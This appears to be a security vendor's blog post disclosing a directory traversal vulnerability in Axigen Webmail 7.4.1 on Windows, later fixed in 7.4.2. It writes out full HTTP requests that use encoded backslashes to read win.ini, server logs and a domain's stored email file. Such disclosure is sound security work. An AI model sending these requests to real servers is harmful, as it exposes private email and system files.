Note: This article refers to an older version of Acunetix. Click here to download the latest version.
We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a very serious web vulnerability discovered by Acunetix WVS in Axigen.
Axigen is an integrated email, calendaring & collaboration platform, masterfully built on our unique Linux mail server technology, for increased speed & security.
Axigen Webmail version 7.4.1 is vulnerable to a directory traversal vulnerability. Only Axigen installations running on Windows platforms are affected. By URL encoding the "" character to %5C it's possible to bypass the directory traversal protection available in this application. Our scanner reported the following alert:
By requesting the following URL (/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini) it's possible to read the contents of file c:windowswin.ini. Using this encoding trick it's possible to traverse directories and see the contents of any file that is readable by the web server user.
Here is a sample HTTP request:
GET http://192.168.0.222:80/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0; passwordExpireWarning=0 Host: 192.168.0.222:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
While investigating this alert, I've discovered that this vulnerability is more serious than I initially expected. This is a very serious vulnerability because using information from the log files it's possible to gather enough information to read the file containing all the emails from all the domains hosted on the server.
For, example, using an HTTP request like:
GET /..%5c..%5c/log/everything.txt HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache
you can access the log file. From here you get determine the domain name and using this information you can read the file containing all the emails from this domain:
GET /..%5c..%5c/domains/localdomain/00.hsf HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache
This vulnerability was reported to the Axigen team on 22/7/2010 via the support system on their website and they were fixed in Axigen version 7.4.2. If you are using Axigen, download the latest version from their website. The changelog is available here.